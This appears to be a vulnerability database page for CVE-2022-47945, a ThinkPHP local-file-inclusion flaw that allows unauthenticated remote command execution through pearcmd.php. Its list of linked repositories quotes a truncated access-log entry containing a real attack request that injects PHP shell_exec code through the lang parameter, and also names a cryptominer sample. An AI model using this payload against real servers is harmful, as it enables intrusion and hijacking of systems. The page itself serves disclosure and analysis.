NA

CVE-2022-47945

Published: 23/12/2022 Updated: 08/08/2023
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

ThinkPHP Framework prior to 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

thinkphp thinkphp

Github Repositories

miner.bldbd/xmrig sample

redtail While analyzing my daily accesslog report, I noticed something really, really wrong 26 December 2023, 04:21 2021200239 GET /indexphp?lang=////////usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode(\ Above is the processed accesslog report I believe there's a raw base64 string present over there, b